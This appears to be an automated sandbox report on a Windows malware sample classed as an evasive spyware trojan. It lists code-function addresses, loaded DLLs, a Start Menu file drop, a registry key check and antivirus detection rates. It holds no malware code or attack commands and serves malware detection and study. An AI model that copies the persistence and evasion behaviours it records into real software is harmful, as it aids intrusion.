Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C00011	4_2_37C00011
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0F111	4_2_37C0F111
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C02915	4_2_37C02915
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C02918	4_2_37C02918
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0C618	4_2_37C0C618
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C05219	4_2_37C05219
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0F120	4_2_37C0F120
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C08325	4_2_37C08325
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C05228	4_2_37C05228
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C08328	4_2_37C08328
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0322A	4_2_37C0322A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0AE2D	4_2_37C0AE2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0AE30	4_2_37C0AE30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C06B35	4_2_37C06B35
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0D935	4_2_37C0D935
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C09637	4_2_37C09637
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C03238	4_2_37C03238
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C0D938	4_2_37C0D938
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C05B39	4_2_37C05B39
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C373E0	4_2_37C373E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C3DA30	4_2_37C3DA30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C357C0	4_2_37C357C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C325C0	4_2_37C325C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C341E0	4_2_37C341E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30FE0	4_2_37C30FE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C35180	4_2_37C35180
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C31F80	4_2_37C31F80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C33BA0	4_2_37C33BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C309A0	4_2_37C309A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C36DA0	4_2_37C36DA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C34B40	4_2_37C34B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C31940	4_2_37C31940
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C33560	4_2_37C33560
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30360	4_2_37C30360
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C36760	4_2_37C36760
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C3F168	4_2_37C3F168
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C34500	4_2_37C34500
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C31300	4_2_37C31300
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C36120	4_2_37C36120
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C32F20	4_2_37C32F20
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C370C0	4_2_37C370C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C33EC0	4_2_37C33EC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30CC0	4_2_37C30CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C35AE0	4_2_37C35AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C328E0	4_2_37C328E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C39CE8	4_2_37C39CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C36A80	4_2_37C36A80
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C33880	4_2_37C33880
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30680	4_2_37C30680
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C354A0	4_2_37C354A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C322A0	4_2_37C322A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C36440	4_2_37C36440
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C33240	4_2_37C33240
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30040	4_2_37C30040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C34E60	4_2_37C34E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C31C60	4_2_37C31C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C30670	4_2_37C30670
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C35E00	4_2_37C35E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C32C00	4_2_37C32C00
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C34820	4_2_37C34820
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C31620	4_2_37C31620
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4FB30	4_2_37C4FB30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C41CF0	4_2_37C41CF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C48470	4_2_37C48470
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C409C2	4_2_37C409C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4F1D0	4_2_37C4F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C409D0	4_2_37C409D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C48DD0	4_2_37C48DD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4BFD0	4_2_37C4BFD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4DBF0	4_2_37C4DBF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4A9F0	4_2_37C4A9F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4B990	4_2_37C4B990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C48790	4_2_37C48790
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4EB90	4_2_37C4EB90
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4D5B0	4_2_37C4D5B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4A3B0	4_2_37C4A3B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4E550	4_2_37C4E550
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4B350	4_2_37C4B350
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C41351	4_2_37C41351
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C41360	4_2_37C41360
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C43360	4_2_37C43360
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C49D70	4_2_37C49D70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4CF70	4_2_37C4CF70
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C40508	4_2_37C40508
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4AD10	4_2_37C4AD10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4DF10	4_2_37C4DF10
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4C930	4_2_37C4C930
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C49730	4_2_37C49730
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4D8D0	4_2_37C4D8D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4A6D0	4_2_37C4A6D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C41CE0	4_2_37C41CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4F4F0	4_2_37C4F4F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C490F0	4_2_37C490F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4C2F0	4_2_37C4C2F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C404FA	4_2_37C404FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C40E8A	4_2_37C40E8A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4A090	4_2_37C4A090
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4D290	4_2_37C4D290
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C40E98	4_2_37C40E98
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4BCB0	4_2_37C4BCB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C48AB0	4_2_37C48AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4EEB0	4_2_37C4EEB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C40040	4_2_37C40040
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C49A50	4_2_37C49A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4CC50	4_2_37C4CC50
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4E870	4_2_37C4E870
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4B670	4_2_37C4B670
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4C610	4_2_37C4C610
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C49410	4_2_37C49410
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4F810	4_2_37C4F810
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4181B	4_2_37C4181B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4E221	4_2_37C4E221
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C41828	4_2_37C41828
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4B030	4_2_37C4B030
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4E230	4_2_37C4E230
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C4003A	4_2_37C4003A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C616D8	4_2_37C616D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C632B0	4_2_37C632B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C61DF8	4_2_37C61DF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C63998	4_2_37C63998
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C624E0	4_2_37C624E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C60FF0	4_2_37C60FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C62BC8	4_2_37C62BC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C616C8	4_2_37C616C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C6329F	4_2_37C6329F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C61DE8	4_2_37C61DE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C63987	4_2_37C63987
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C624D0	4_2_37C624D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C601E1	4_2_37C601E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C601E8	4_2_37C601E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C60FE5	4_2_37C60FE5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C60C77	4_2_37C60C77
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C60C78	4_2_37C60C78
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37C62BB9	4_2_37C62BB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37D59B91	4_2_37D59B91
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_37D5139C	4_2_37D5139C

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: String function: 00402B38 appears 45 times

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000000.00000000.1670115634.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs SecuriteInfo.com.FileRepMalware.23885.29286.exe
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000000.1979351357.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs SecuriteInfo.com.FileRepMalware.23885.29286.exe
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.00000000044D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.FileRepMalware.23885.29286.exe
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946157813.0000000034677000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.FileRepMalware.23885.29286.exe
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe	Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs SecuriteInfo.com.FileRepMalware.23885.29286.exe

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/30@5/5

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,

0_2_0040206A

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File created: C:\Users\user\AppData\Local\Temp\nsf1DFB.tmp

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe	Virustotal: Detection: 27%
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Section loaded: mscoree.dll	Jump to behavior
